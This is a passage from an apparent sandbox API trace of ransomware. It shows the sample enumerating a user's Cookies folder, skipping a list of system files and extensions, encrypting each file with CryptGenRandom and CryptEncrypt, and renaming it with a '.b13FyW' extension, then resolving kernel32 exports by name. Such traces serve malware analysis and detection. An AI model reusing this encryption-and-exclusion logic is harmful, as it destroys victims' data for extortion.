returned="EnumDateFormatsExW" [0078.896] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.896] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.896] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.896] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt") returned 110 [0078.896] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW") returned 117 [0078.896] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13fyw"), dwFlags=0x0) returned 1 [0078.897] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.897] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.897] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.898] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1dcf9270, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1dcf9270, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1dcf9270, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@everesttech[1].txt", cAlternateFileName="5P5NRG~4.TXT")) returned 1 [0078.898] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0078.898] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt", lpString2="autorun.inf") returned -1 [0078.898] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt", lpString2="boot.ini") returned -1 [0078.898] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt", lpString2="desktop.ini") returned -1 [0078.898] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt", lpString2="ntuser.dat") returned -1 [0078.898] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt", lpString2="iconcache.db") returned -1 [0078.898] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt", lpString2="bootsect.bak") returned -1 [0078.898] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt", lpString2="ntuser.dat.log") returned -1 [0078.898] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt", lpString2="thumbs.db") returned -1 [0078.898] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt", lpString2="Bootfont.bin") returned -1 [0078.898] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@everesttech[1].txt") returned 39 [0078.898] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0078.898] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0078.898] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0078.898] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0078.898] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0078.898] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@everesttech[1].txt") returned 39 [0078.898] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0078.898] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="5p5nrgjn0js_halpmcxz@everesttech[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt" [0078.898] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.898] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0078.899] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=110) returned 1 [0078.899] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0078.899] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.899] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.899] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.899] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.901] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0078.902] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.902] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.902] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.903] CloseHandle (hObject=0x45c) returned 1 [0078.903] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.903] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0078.903] CloseHandle (hObject=0x0) returned 0 [0078.903] CloseHandle (hObject=0x458) returned 1 [0078.904] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.904] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.904] GetTickCount () returned 0x114c38e [0078.905] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.905] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.905] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.905] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.905] lstrlenA (lpString="kernel32.dll") returned 12 [0078.905] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.905] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.906] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.906] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.906] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.906] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.906] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.906] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.906] lstrlenA (lpString="ADDATOMA") returned 8 [0078.906] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.906] lstrlenA (lpString="ADDATOMW") returned 8 [0078.906] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.906] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.906] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.906] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.906] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.906] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.906] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.906] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.906] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.906] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.906] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.906] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.906] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.906] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.906] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.906] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.906] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.906] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.906] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.906] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.906] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.906] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.906] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.906] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.906] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.906] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.906] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.906] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.907] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.907] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.907] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.907] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.907] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.907] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.907] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.907] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.907] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.907] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.907] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.907] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.907] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.907] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.907] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.907] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.907] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.907] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.907] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.907] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.907] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.907] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.907] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.907] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.907] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.907] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.907] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.907] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.907] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.907] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.907] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.907] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.907] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.907] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.907] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.907] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.907] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.907] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.908] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.908] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.908] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.908] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.908] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.908] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.908] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.908] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.908] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.908] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.908] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.908] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.908] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.908] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.908] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.908] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.908] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.908] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.908] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.908] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.908] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.908] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.908] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.908] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.908] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.908] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.908] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.908] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.908] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.908] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.908] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.908] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.908] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.908] lstrlenA (lpString="BEEP") returned 4 [0078.908] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.909] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.909] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.909] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.909] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.909] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.909] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.909] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.909] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.909] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.909] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.909] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.909] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.909] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.909] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.909] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.909] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.909] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.909] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.909] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.909] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.909] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.909] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.909] lstrlenA (lpString="CANCELIO") returned 8 [0078.909] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.909] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.909] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.909] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.909] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.909] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.909] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.909] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.909] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.909] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.909] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.909] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.909] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.909] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.910] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.910] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.910] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.910] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.910] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.910] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.910] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.910] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.910] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.910] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.910] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.910] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.910] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.910] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.910] 